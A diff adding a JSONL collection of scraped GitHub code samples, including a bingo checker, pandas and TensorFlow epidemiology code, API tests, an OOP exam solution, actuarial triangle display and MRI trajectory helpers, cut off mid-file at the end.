diff --git "a/5006.jsonl" "b/5006.jsonl" new file mode 100644--- /dev/null +++ "b/5006.jsonl" @@ -0,0 +1,2134 @@ +{"seq_id":"2228900415","text":"# Bingo: verificando uma cartela vencedora\r\nimport random\r\ndef dicionário_bingo(sorteados):\r\n dicionario = {'B':'','I':'','N':'','G':'','O':''}\r\n inicio=1\r\n fim=16\r\n for chave in dicionario:\r\n lista= []\r\n while len(lista)<5:\r\n numero = random.randrange(inicio,fim)\r\n if numero not in lista:\r\n if numero in sorteados:\r\n lista.append(0)\r\n else:\r\n lista.append(numero)\r\n dicionario[chave]=lista\r\n inicio+=15\r\n fim+=15\r\n\r\n return dicionario\r\n\r\ndef cartela_bingo(dicionario):\r\n print('-----------------------------------')\r\n for chave in dicionario:\r\n print( chave,'\\t', end='')\r\n print('\\n-----------------------------------')\r\n\r\n for i in range(5):\r\n for chave in dicionario:\r\n print(dicionario[chave][i],'\\t', end='')\r\n print()\r\n return ''\r\n\r\ndef cartela_vencedora(dicionario):\r\n conjunto = set()\r\n verdadeiro = {0,0,0,0,0}\r\n\r\n # verificar linhas\r\n for i in range(5):\r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n \r\n # verificar colunas\r\n for chave in dicionario:\r\n for numero in dicionario[chave]:\r\n conjunto.add(numero)\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n\r\n # verificar diagonais\r\n i = 0\r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n i+=1\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n conjunto.clear()\r\n \r\n i = 4 \r\n for chave in dicionario:\r\n conjunto.add(dicionario[chave][i])\r\n i-=1\r\n if conjunto.issubset(verdadeiro):\r\n return True\r\n return False\r\n\r\ndef main():\r\n sorteados = set()\r\n while len(sorteados)<5:\r\n numero = random.randrange(1,76)\r\n if numero not in sorteados:\r\n sorteados.add(numero)\r\n \r\n cartela_diagonal = {'B': [7, 11, 12, 8, 0], 'I': [25, 27, 19, 0, 25], 'N': [40, 39, 0, 33, 44], 'G': [49, 0, 58, 48, 60], 'O': [0, 73, 63, 75, 62]}\r\n \r\n cartela_horizontal = {'B': [0, 11, 12, 8, 9], 'I': [0, 27, 19, 29, 25], 'N': [0, 40, 39, 33, 44], 'G': [0, 55, 58, 48, 60], 'O': [0, 73, 63, 75, 62]}\r\n \r\n cartela_vertical = {'B': [5, 9, 15, 10, 4], 'I': [0, 0, 0, 0, 0], 'N': [36, 38, 44, 33, 45], 'G': [50, 48, 56, 60, 51], 'O': [67, 64, 70, 75, 62]}\r\n \r\n cartela_aleatória = dicionário_bingo(sorteados)\r\n\r\n cartelas = [cartela_diagonal, cartela_horizontal ,cartela_vertical ,cartela_aleatória]\r\n\r\n for elemento in cartelas:\r\n if cartela_vencedora(elemento):\r\n print('CARTELA VENCEDORA:')\r\n else:\r\n print('CARTELA NÃO VENCEDORA:')\r\n print(cartela_bingo(elemento))\r\n \r\nif __name__==\"__main__\":\r\n main()","repo_name":"nickellen/Algoritmos","sub_path":"lista 7/MES-Alg-07-Ex-08.py","file_name":"MES-Alg-07-Ex-08.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40805802950","text":"import pandas as pd\nimport numpy as np\n\ndates = pd.date_range('20130101', periods=6)\ndf = pd.DataFrame(data=np.random.randn(6,4), index=dates, columns=['A', 'B', 'C', 'D'])\n\n#根据下标改变某一个的值\ndf.iloc[2,2] = 111\n\n#根据标签改变某一个值\ndf.loc['201430101','B'] = 222\n\n#根据标签+数字改变值\n#df.ix[[:3],'A'] = 333\n\n#根据条件改变值\ndf.A[df.A>0] = 0\ndf[df.A>0] = 0\n\n#加入新的列\ndf['F'] = np.nan\n\n#添加新的一列--\ndf['E'] = pd.Series([1,2,3,4,5,6],index=pd.date_range('20130101',periods = 6))\nprint(df)","repo_name":"jainszhang/LearnDM","sub_path":"ML/pandas_numpy/pandas/pandas3-设置值.py","file_name":"pandas3-设置值.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73771068007","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport plotting_funcs as pf\nfrom collections import namedtuple\nimport tf_att_fracts\n\n\ndef att_fract_fn(mixing_matrices, parms):\n def compute_att_fracts(args):\n state, covariate_pointers, event_id, event_pid = args\n\n memb_mat_t = tf.gather(\n mixing_matrices[\"memb_mats\"],\n covariate_pointers,\n name=\"gather_memb_mats\",\n )\n\n adj_mat_t = tf.gather(\n mixing_matrices[\"adj_mats\"],\n covariate_pointers,\n name=\"gather_adj_mats\",\n )\n\n is_in_hospital_t = tf.gather(\n mixing_matrices[\"hospital_status_mats\"],\n covariate_pointers,\n name=\"gather_hosp_status\",\n )\n\n spatial_conn_t = tf.gather(\n mixing_matrices[\"spatial_conn_mats\"],\n covariate_pointers,\n name=\"gather_spatial_status\",\n )\n\n # Number of infectious individuals in each group\n inf_group = tf.linalg.matvec(\n memb_mat_t,\n tf.gather(state, 2) * is_in_hospital_t,\n transpose_a=True,\n name=\"inf_group_matmul\",\n )\n\n foi_group = (\n parms[\"beta1\"] * inf_group\n + parms[\"beta2\"]\n * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n )\n + parms[\"beta3\"]\n * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n + parms[\"beta4\"]\n )\n\n # FOI components\n foi_within_ward = parms[\"beta1\"] * inf_group\n foi_between_ward = parms[\"beta2\"] * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n ) + parms[\"beta3\"] * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n foi_background = parms[\"beta4\"]\n\n # Attributable fractions\n pr_within_ward = foi_within_ward / foi_group\n\n pr_between_ward = foi_between_ward / foi_group\n\n pr_beta2 = (\n parms[\"beta2\"]\n * tf.linalg.matvec(\n adj_mat_t, inf_group, name=\"adj_mat_t_inf_group_matvec\"\n )\n ) / foi_group\n\n pr_beta3 = (\n parms[\"beta3\"]\n * tf.linalg.matvec(\n spatial_conn_t,\n inf_group,\n name=\"spatial_mat_t_inf_group_matvec\",\n )\n ) / foi_group\n\n pr_background = parms[\"beta4\"] / foi_group\n\n # Identify which ward the exposure event occured in\n ward_exp = tf.cond(\n tf.gather(is_in_hospital_t, event_pid) == 1,\n true_fn=lambda: tf.gather(memb_mat_t, event_pid),\n false_fn=lambda: tf.zeros_like(inf_group),\n )\n\n # Create dictionary of attributatble fractions - return np.nan if exposure happened in the community\n att_fracts = {\n \"event_unit\": event_pid,\n \"pr_within_ward\": tf.reduce_sum(pr_within_ward * ward_exp),\n \"pr_between_ward\": tf.reduce_sum(pr_between_ward * ward_exp),\n \"pr_background\": tf.reduce_sum(pr_background * ward_exp),\n \"pr_community\": tf.cond(\n tf.gather(is_in_hospital_t, event_pid) == 1,\n true_fn=lambda: 0.0,\n false_fn=lambda: 1.0,\n ),\n }\n\n between_ward_fracts = {\n \"event_unit\": event_pid,\n \"pr_beta2\": tf.reduce_sum(pr_beta2 * ward_exp),\n \"pr_beta3\": tf.reduce_sum(pr_beta3 * ward_exp),\n }\n\n all_wards_pr = {\n \"foi_by_ward\": foi_group,\n \"foi_within_ward\": foi_within_ward * 1,\n \"foi_between_ward\": foi_between_ward * 1,\n \"foi_background\": foi_background * 1,\n }\n\n between_ward_transmission = pr_between_ward * ward_exp\n\n return (\n att_fracts,\n between_ward_fracts,\n ward_exp,\n between_ward_transmission,\n all_wards_pr,\n )\n\n return compute_att_fracts\n\n\ndef determine_att_fracts(\n post,\n model_vars,\n transmission_table_pids,\n fixed_event_list,\n all_wards,\n hospital_event_times,\n ward_cols,\n):\n between_ward_att_fract = []\n att_fracts_all = []\n exp_by_ward = []\n ward_cols_nosoc = []\n ward_foi_within_ward_all = []\n ward_foi_between_ward_all = []\n ward_foi_background_all = []\n ward_foi_all = []\n\n EventList = namedtuple(\"EventList\", [\"time\", \"unit\", \"event\"])\n\n for i in range(0, post.beta1.shape[0] - 1):\n event_list = EventList(\n tf.convert_to_tensor(post.time[i]),\n tf.convert_to_tensor(post.unit[i]),\n tf.convert_to_tensor(post.event[i]),\n )\n\n ChainState = namedtuple(\n \"ChainState\", [\"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\"]\n )\n\n fixed_parms = {\n k: v\n for k, v in model_vars[\"parms\"].items()\n if k not in [\"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\"]\n }\n\n compute_att_fracts = tf_att_fracts.build_att_fracts_fn(\n model_vars[\"hospital_events\"],\n model_vars[\"study_start_time\"],\n model_vars[\"global_ids\"],\n transmission_table_pids,\n model_vars[\"pat_first_pos\"],\n model_vars[\"mixing_matrices\"],\n fixed_parms,\n fixed_event_list,\n tf.constant(True),\n )\n\n post_state = ChainState(\n beta1=post.beta1[i],\n beta2=post.beta2[i],\n beta3=post.beta3[i],\n beta4=post.beta4[i],\n beta5=post.beta5[i],\n )\n (\n att_fracts,\n between_ward_fracts,\n ward_exp,\n between_ward_transmission,\n covariate_pointers_exp,\n all_wards_pr,\n ) = compute_att_fracts(post_state, event_list)\n\n att_fracts = pd.DataFrame(\n {\n \"pr_within_ward\": att_fracts[\"pr_within_ward\"],\n \"pr_between_ward\": att_fracts[\"pr_between_ward\"],\n \"pr_background\": att_fracts[\"pr_background\"],\n \"pr_community\": att_fracts[\"pr_community\"],\n \"event_unit\": att_fracts[\"event_unit\"],\n }\n )\n\n ward_foi_within_ward = pd.DataFrame(all_wards_pr[\"foi_within_ward\"])\n ward_foi_between_ward = pd.DataFrame(all_wards_pr[\"foi_between_ward\"])\n ward_foi_background = pd.DataFrame(all_wards_pr[\"foi_background\"])\n ward_foi = pd.DataFrame(all_wards_pr[\"foi_by_ward\"])\n ward_foi_cov = pd.DataFrame({\"cov_points\": covariate_pointers_exp})\n ward_foi = pd.concat([ward_foi, ward_foi_cov], axis=1)\n ward_foi_within_ward = pd.concat(\n [ward_foi_within_ward, ward_foi_cov], axis=1\n )\n ward_foi_between_ward = pd.concat(\n [ward_foi_between_ward, ward_foi_cov], axis=1\n )\n ward_foi_background = pd.concat(\n [ward_foi_background, ward_foi_cov], axis=1\n )\n\n att_fracts_all.append(att_fracts)\n ward_foi_within_ward_all.append(ward_foi_within_ward)\n ward_foi_between_ward_all.append(ward_foi_between_ward)\n ward_foi_background_all.append(ward_foi_background)\n ward_foi_all.append(ward_foi)\n\n hosp_exp_between_ward = pd.DataFrame(\n {\n \"pr_beta2\": between_ward_fracts[\"pr_beta2\"],\n \"pr_beta3\": between_ward_fracts[\"pr_beta3\"],\n \"event_unit\": between_ward_fracts[\"event_unit\"],\n }\n )\n between_ward_att_fract.append(hosp_exp_between_ward)\n\n # Nosocomial exposures by ward\n exposures_on_each_ward = tf.cast(tf.reduce_sum(ward_exp, 0), tf.int32)\n ward_exposures = pd.DataFrame(\n {\"wards\": all_wards, \"exposures\": exposures_on_each_ward}\n )\n ward_exposures[\"perc\"] = np.round(\n (ward_exposures[\"exposures\"] / sum(ward_exposures[\"exposures\"]))\n * 100,\n 2,\n )\n ward_exposures.sort_values(by=[\"perc\"], ascending=False, inplace=True)\n exp_by_ward.append(ward_exposures)\n\n # Nosocomial exposure by ward colour\n hosp_exp_inds = tf.where(att_fracts[\"pr_community\"] != 1.0)\n covariate_times_hosp_exp = tf.gather(\n covariate_pointers_exp, hosp_exp_inds\n )\n hosp_exp_time_from_study = tf.gather(\n hospital_event_times, covariate_times_hosp_exp\n )\n\n ward_exp_hosp = tf.squeeze(tf.gather(ward_exp, hosp_exp_inds))\n ward_exp_hosp = tf.gather(\n tf.where(ward_exp_hosp > 0), indices=1, axis=1\n )\n wards_exp_hosp = [all_wards[x] for x in ward_exp_hosp]\n\n wards_exp_hosp_col_day = tf.cast(\n tf.math.floor(hosp_exp_time_from_study), tf.int64\n )\n ward_exp_hosp_col = [\n ward_cols[x][y]\n for x, y in zip(\n wards_exp_hosp, np.array(tf.squeeze(wards_exp_hosp_col_day))\n )\n ]\n ward_cols_hosp_exp = pd.DataFrame(\n {\"colour\": ward_exp_hosp_col, \"freq\": 1}\n )\n ward_cols_hosp_exp = ward_cols_hosp_exp.groupby([\"colour\"]).agg(\n {\"freq\": sum}\n )\n ward_cols_hosp_exp[\"perc\"] = ward_cols_hosp_exp.apply(\n lambda x: 100 * (x / x.sum())\n )\n\n ward_cols_nosoc.append(ward_cols_hosp_exp)\n\n return (\n att_fracts_all,\n exp_by_ward,\n ward_foi_all,\n ward_foi_within_ward_all,\n ward_foi_between_ward_all,\n ward_foi_background_all,\n ward_cols_nosoc,\n )\n","repo_name":"jbridgen/nosocomial_covid_model","sub_path":"hospital_model/att_fracts_funcs.py","file_name":"att_fracts_funcs.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75115189927","text":"from pyrocko.model import event\nfrom pyrocko import orthodrome, util\nfrom pyrocko.guts import dump\nimport sys\nfrom pathlib import Path\nimport numpy as num\n\nkm = 1000.\n\nglobal evpath\n\n\ndef duplicate_property(array):\n ndims = len(array.shape)\n if ndims == 1:\n return num.hstack((array, array))\n elif ndims == 2:\n return num.vstack((array, array))\n else:\n raise TypeError('Only 1-2d data supported!')\n\n\ndef to_cartesian(items, reflatlon):\n res = defaultdict()\n for i, item in enumerate(items):\n\n y, x = ortho.latlon_to_ne(reflatlon, item)\n depth = item.depth\n elevation = item.elevation\n dz = elevation - depth\n lat = item.lat/180.*num.pi\n z = r_earth+dz*num.sin(lat)\n res[item.nsl()[:2]] = (x, y, z)\n return res\n\n\ndef cmp(a, b):\n return (a > b) - (a < b)\n\n\ndef well_geometry_sparrow_export(file, folder, name):\n import utm\n from pyproj import Proj\n from pyrocko.model import Geometry\n data = num.loadtxt(file, delimiter=\",\")\n utmx = data[:, 0]\n utmy = data[:, 1]\n z = data[:, 2]\n\n proj_gk4 = Proj(init=\"epsg:31467\") # GK-projection\n lons, lats = proj_gk4(utmx, utmy, inverse=True)\n ev = event.Event(lat=num.mean(lats), lon=num.mean(lons), depth=num.mean(z),\n time=util.str_to_time(\"2000-01-01 01:01:01\"))\n\n ncorners = 4\n verts = []\n xs = []\n ys = []\n dist = 200.\n for i in range(0, len(z)):\n try:\n x = lats[i]\n y = lons[i]\n x1 = lats[i+1]\n y1 = lons[i+1]\n depth = z[i]\n depth1 = z[i+1]\n xyz = ([dist/2.8, dist/2.8, depth], [dist/2.8, dist/2.8, depth1],\n [dist/2.8, -dist/2.8, depth1], [dist/2.8, -dist/2.8, depth])\n latlon = ([x, y], [x1, y1], [x1, y1], [x, y])\n patchverts = num.hstack((latlon, xyz))\n verts.append(patchverts)\n except Exception:\n pass\n\n vertices = num.vstack(verts)\n\n npatches = int(len(vertices))\n faces1 = num.arange(ncorners * npatches, dtype='int64').reshape(\n npatches, ncorners)\n faces2 = num.fliplr(faces1)\n faces = num.hstack((faces2, faces1))\n srf_semblance_list = []\n\n srf_semblance = num.ones(num.shape(data[:, 2]))\n srf_semblance = duplicate_property(srf_semblance)\n srf_semblance_list.append(srf_semblance)\n\n srf_semblance = num.asarray(srf_semblance_list).T\n srf_times = num.linspace(0, 1, 1)\n geom = Geometry(times=srf_times, event=ev)\n geom.setup(vertices, faces)\n sub_headers = tuple([str(i) for i in srf_times])\n geom.add_property((('semblance', 'float64', sub_headers)), srf_semblance)\n dump(geom, filename='geom_gtla1.yaml')\n","repo_name":"braunfuss/silvertine","sub_path":"src/util/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42619944332","text":"import base64\nimport datetime\nimport pathlib\n\nimport pymongo\nimport pytest\n\nfrom equilibrium.api.api import get_app\nfrom equilibrium.api.__main__ import main\n\nUSER = {\n \"user_id\": 1,\n \"username\": \"John Smith\",\n \"birthday\": int(datetime.datetime(year=1997, month=8, day=18).timestamp()),\n \"gender\": 0,\n}\n\nSNAPSHOT = {\n \"user_id\": 1,\n \"timestamp\": int(datetime.datetime.now().timestamp() * 1000),\n \"feelings\": {\n \"hunger\": 0,\n \"thirst\": 0,\n \"exhaustion\": 0,\n \"happiness\": 0,\n },\n \"color_image\": {\n \"width\": 1920,\n \"height\": 1080,\n \"data\": str(pathlib.Path(__file__).absolute().parent / \"resources/color_image.jpg\"),\n }\n}\n\nDATA = base64.b64encode(pathlib.Path(SNAPSHOT[\"color_image\"][\"data\"]).read_bytes()).decode()\n\n\n@pytest.fixture(scope=\"module\")\ndef api_state(mongodb, simulate_tcp_27017):\n c = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n c.db.users.insert_one(USER)\n c.db.snapshots.insert_one(SNAPSHOT)\n\n app = get_app(\"mongodb://127.0.0.1:27017\")\n with app.test_client() as client:\n yield client\n\n\ndef test_get_users(api_state):\n r = api_state.get(\"/users\")\n assert r.json == [{\"user_id\": USER[\"user_id\"], \"username\": USER[\"username\"]}]\n\n\ndef test_get_user(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}\")\n assert r.json == {\"user_id\": USER[\"user_id\"], \"username\": USER[\"username\"],\n \"birthday\": USER[\"birthday\"], \"gender\": USER[\"gender\"]}\n\n\ndef test_get_snapshots(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots\")\n assert r.json == [SNAPSHOT[\"timestamp\"]]\n\n\ndef test_get_snapshot(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}\")\n assert r.json == {\"timestamp\": SNAPSHOT[\"timestamp\"],\n \"results\": [\"feelings\", \"color_image\"]}\n\n\ndef test_get_result(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}/feelings\")\n assert r.json == SNAPSHOT[\"feelings\"]\n\n\ndef test_get_result_data(api_state):\n r = api_state.get(f\"/users/{USER['user_id']}/snapshots/{SNAPSHOT['timestamp']}/color_image/data\")\n assert r.json == {\"width\": SNAPSHOT[\"color_image\"][\"width\"],\n \"height\": SNAPSHOT[\"color_image\"][\"height\"],\n \"data\": DATA\n }\n","repo_name":"talelburg/equilibrium","sub_path":"tests/equilibrium/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24934797566","text":"from project.planet.planet_repository import PlanetRepository\nfrom project.planet.planet import Planet\nfrom project.astronaut.astronaut_repository import AstronautRepository\nfrom project.astronaut.biologist import Biologist\nfrom project.astronaut.geodesist import Geodesist\nfrom project.astronaut.meteorologist import Meteorologist\n\n\nclass SpaceStation:\n ASTRONAUT_TYPES = {\n \"Biologist\": Biologist,\n \"Geodesist\": Geodesist,\n \"Meteorologist\": Meteorologist\n }\n\n SUCCESSFUL_MISSIONS = 0\n UNSUCCESSFUL_MISSIONS = 0\n\n def __init__(self):\n self.planet_repository = PlanetRepository()\n self.astronaut_repository = AstronautRepository()\n\n def add_astronaut(self, astronaut_type: str, name: str):\n if self.astronaut_repository.find_by_name(name):\n return f\"{name} is already added.\"\n\n if astronaut_type not in self.ASTRONAUT_TYPES:\n raise Exception(\"Astronaut type is not valid!\")\n\n self.astronaut_repository.add(self.ASTRONAUT_TYPES[astronaut_type](name))\n\n return f\"Successfully added {astronaut_type}: {name}.\"\n\n def add_planet(self, name: str, items: str):\n if self.planet_repository.find_by_name(name):\n return f\"{name} is already added.\"\n\n planet_obj = Planet(name)\n planet_obj.items = items.split(\", \")\n self.planet_repository.add(planet_obj)\n\n return f\"Successfully added Planet: {name}.\"\n\n def retire_astronaut(self, name: str):\n astronaut_obj = self.astronaut_repository.find_by_name(name)\n\n if not astronaut_obj:\n raise Exception(f\"Astronaut {name} doesn't exist!\")\n\n self.astronaut_repository.remove(astronaut_obj)\n return f\"Astronaut {name} was retired!\"\n\n def recharge_oxygen(self):\n for astronaut in self.astronaut_repository.astronauts:\n astronaut.increase_oxygen(10)\n\n def send_on_mission(self, planet_name: str):\n planet_obj = self.planet_repository.find_by_name(planet_name)\n\n if not planet_obj:\n raise Exception(\"Invalid planet name!\")\n\n suitable_astronauts = [a for a in self.astronaut_repository.astronauts if a.oxygen > 30]\n\n if not suitable_astronauts:\n raise Exception(\"You need at least one astronaut to explore the planet!\")\n\n sorted_suitable = sorted(suitable_astronauts, key=lambda x: -x.oxygen)\n\n explorer_count = 0\n for curr_astr in sorted_suitable:\n explorer_count += 1\n\n while planet_obj.items:\n curr_item = planet_obj.items.pop()\n curr_astr.backpack.append(curr_item)\n curr_astr.breathe()\n\n if len(planet_obj.items) == 0:\n self.SUCCESSFUL_MISSIONS += 1\n return f\"Planet: {planet_name} was explored. {explorer_count}\" \\\n f\" astronauts participated in collecting items.\"\n\n if curr_astr.oxygen <= 0:\n break\n\n if explorer_count == 5:\n break\n\n self.UNSUCCESSFUL_MISSIONS += 1\n return \"Mission is not completed.\"\n\n def report(self):\n result = [f\"{self.SUCCESSFUL_MISSIONS} successful missions!\",\n f\"{self.UNSUCCESSFUL_MISSIONS} missions were not completed!\", f\"Astronauts' info:\"]\n\n for astronaut in self.astronaut_repository.astronauts:\n result.append(f\"Name: {astronaut.name}\")\n result.append(f\"Oxygen: {astronaut.oxygen}\")\n backpack = \"none\" if len(astronaut.backpack) == 0 else \", \".join(astronaut.backpack)\n result.append(f\"Backpack items: {backpack}\")\n\n return \"\\n\".join(result)\n","repo_name":"Polishko/SoftUni","sub_path":"OOP-Exam-Questions/23 August 2021 - Retake/project/space_station.py","file_name":"space_station.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12447728908","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nimport pandas as pd\nimport numpy as np\nimport re\n\ntry:\n from IPython.core.display import HTML\nexcept:\n HTML = None\n\n\nclass TriangleDisplay:\n def __repr__(self):\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n return data.to_string()\n else:\n return self._summary_frame().__repr__()\n\n def _summary_frame(self):\n return pd.Series(\n [\n self.valuation_date.strftime(\"%Y-%m\"),\n \"O\" + self.origin_grain + \"D\" + self.development_grain,\n self.shape,\n self.key_labels,\n list(self.vdims),\n ],\n index=[\"Valuation:\", \"Grain:\", \"Shape:\", \"Index:\", \"Columns:\"],\n name=\"Triangle Summary\",\n ).to_frame()\n\n def _repr_html_(self):\n \"\"\" Jupyter/Ipython HTML representation \"\"\"\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n fmt_str = self._get_format_str(data)\n default = (\n data.to_html(\n max_rows=pd.options.display.max_rows,\n max_cols=pd.options.display.max_columns,\n float_format=fmt_str.format,\n )\n .replace(\"nan\", \"\")\n .replace(\"NaN\", \"\")\n )\n return default\n else:\n return self._summary_frame().to_html(\n max_rows=pd.options.display.max_rows,\n max_cols=pd.options.display.max_columns,\n )\n\n def _get_format_str(self, data):\n if np.all(np.isnan(data)):\n return \"\"\n elif np.nanmean(abs(data)) < 10:\n return \"{0:,.4f}\"\n elif np.nanmean(abs(data)) < 1000:\n return \"{0:,.2f}\"\n else:\n return \"{:,.0f}\"\n\n def _repr_format(self, origin_as_datetime=False):\n out = self.compute().set_backend(\"numpy\").values[0, 0]\n if origin_as_datetime and not self.is_pattern:\n origin = self.origin.to_timestamp(how='s')\n else:\n origin = self.origin.copy()\n origin.name = None\n\n if self.origin_grain == \"S\" and not origin_as_datetime:\n origin_formatted = [\"\"] * len(origin)\n for origin_index in range(len(origin)):\n origin_formatted[origin_index] = (\n origin.astype(\"str\")[origin_index]\n .replace(\"Q1\", \"H1\")\n .replace(\"Q3\", \"H2\")\n )\n origin = origin_formatted\n development = self.development.copy()\n development.name = None\n return pd.DataFrame(out, index=origin, columns=development)\n\n def heatmap(self, cmap=\"coolwarm\", low=0, high=0, axis=0, subset=None):\n \"\"\" Color the background in a gradient according to the data in each\n column (optionally row). Requires matplotlib\n\n Parameters\n ----------\n\n cmap : str or colormap\n matplotlib colormap\n low, high : float\n compress the range by these values.\n axis : int or str\n The axis along which to apply heatmap\n subset : IndexSlice\n a valid slice for data to limit the style application to\n\n Returns\n -------\n Ipython.display.HTML\n\n \"\"\"\n if (self.values.shape[0], self.values.shape[1]) == (1, 1):\n data = self._repr_format()\n fmt_str = self._get_format_str(data)\n\n axis = self._get_axis(axis)\n\n raw_rank = data.rank(axis=axis)\n shape_size = data.shape[axis]\n rank_size = data.rank(axis=axis).max(axis=axis)\n gmap = (raw_rank - 1).div(rank_size - 1, axis=not axis) * (\n shape_size - 1\n ) + 1\n gmap = gmap.replace(np.nan, (shape_size + 1) / 2)\n if pd.__version__ >= \"1.3\":\n default_output = (\n data.style.format(fmt_str)\n .background_gradient(\n cmap=cmap,\n low=low,\n high=high,\n axis=None,\n subset=subset,\n gmap=gmap,\n )\n .to_html()\n )\n else:\n default_output = (\n data.style.format(fmt_str)\n .background_gradient(cmap=cmap, low=low, high=high, axis=axis,)\n .render()\n )\n output_xnan = re.sub(\"\", \"\", default_output)\n else:\n raise ValueError(\"heatmap only works with single triangles\")\n if HTML:\n return HTML(output_xnan)\n elif HTML is None:\n raise ImportError(\"heatmap requires IPython\")\n","repo_name":"casact/chainladder-python","sub_path":"chainladder/core/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"53"} +{"seq_id":"25042193171","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pymerlin.trajectory import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.spatial import SphericalVoronoi, geometric_slerp\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom matplotlib import colors\nimport scipy\nfrom matplotlib import cm\n\n\ndef fibonacci(k):\n \"\"\"\n Calculates the kth Fibonacci number\n \"\"\"\n\n if k == 0:\n return 0\n elif k == 1 or k == 2:\n return 1\n else:\n return fibonacci(k-1)+fibonacci(k-2)\n\n\ndef voronoi_area(traj, aref=None, vmin=None, vmax=None):\n nspokes, _ = traj.shape\n radius = 1\n center = np.array([0, 0, 0])\n sv = SphericalVoronoi(traj, radius, center)\n\n if not aref:\n Asphere = 4*np.pi\n aref = Asphere/nspokes\n\n areas = sv.calculate_areas()\n Amax = max(areas)\n areas /= aref\n\n if vmax:\n areas[areas > vmax] = vmax\n if vmin:\n areas[areas < vmin] = vmin\n\n return sv, areas\n\n\ndef voronoi_3D(traj, ax=None, aref=None, cmap='RdBu_r', vmin=0.7, vmax=1.3, title=''):\n \"\"\"\n Make a 3D voronoi diagram with patch color based on path area\n relative to area for perfectly even sampled\n \"\"\"\n\n sv, areas = voronoi_area(traj, aref=aref, vmin=vmin, vmax=vmax)\n m = cm.ScalarMappable(cmap=cm.get_cmap(\n cmap), norm=plt.Normalize(vmin=vmin, vmax=vmax))\n\n sv.sort_vertices_of_regions()\n if not ax:\n ax = plt.gca()\n\n fig = plt.gcf()\n for n in range(0, len(sv.regions)):\n region = sv.regions[n]\n random_color = colors.rgb2hex(scipy.rand(3))\n ax.scatter(traj[n, 0], traj[n, 1], traj[n, 2], c='k', alpha=0)\n polygon = Poly3DCollection([sv.vertices[region]], alpha=1.0)\n polygon.set_color(m.to_rgba(areas[n]))\n ax.add_collection3d(polygon)\n\n ax.set_xlabel(r'$k_x$')\n ax.set_ylabel(r'$k_y$')\n ax.set_zlabel(r'$k_z$')\n ax.set_xticks([-1, 0, 1])\n ax.set_yticks([-1, 0, 1])\n ax.set_zticks([-1, 0, 1])\n cbar = fig.colorbar(m, shrink=0.75, pad=0.15, label='Relative Area [a.u.]')\n ax.set_title(title)\n\n\ndef gm_3D_trajectory(n):\n \"\"\"\n 3D Golden means trajectory as proposed by Chan et al.\n\n Input:\n n: Number of spokes\n \"\"\"\n # Find the eigen values in equation [5]\n A = np.array([[0, 1, 0],\n [0, 0, 1],\n [1, 0, 1]])\n w, v = np.linalg.eig(A)\n ea = np.real(v[:, 0])\n # Normalise the eigen vector\n ea /= max(ea)\n v1 = ea[0]\n v2 = ea[1]\n print(\"v1: {}, v2: {}\".format(v1, v2))\n m = np.arange(n)\n phi = 2*np.pi*m*v2\n theta = np.arccos(np.mod(m*v1, 1))\n\n traj = np.zeros((n, 3))\n traj[:, 0] = np.cos(phi)*np.sin(theta)\n traj[:, 1] = np.sin(phi)*np.sin(theta)\n traj[:, 2] = np.cos(theta)\n\n return traj\n","repo_name":"emilljungberg/merlin_mrm","sub_path":"notebooks/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24936379286","text":"from collections import deque\n# kesinlikle reduce cozumune de bak\n\noperations = {\"+\": lambda a, b: a + b,\n \"-\": lambda a, b: a - b,\n \"*\": lambda a, b: a * b,\n \"/\": lambda a, b: a // b}\n\ncollection = deque(input().split(\" \"))\nnum_lst = deque() # yeni liste yapmadi item = 0 dedi\n\nresult = 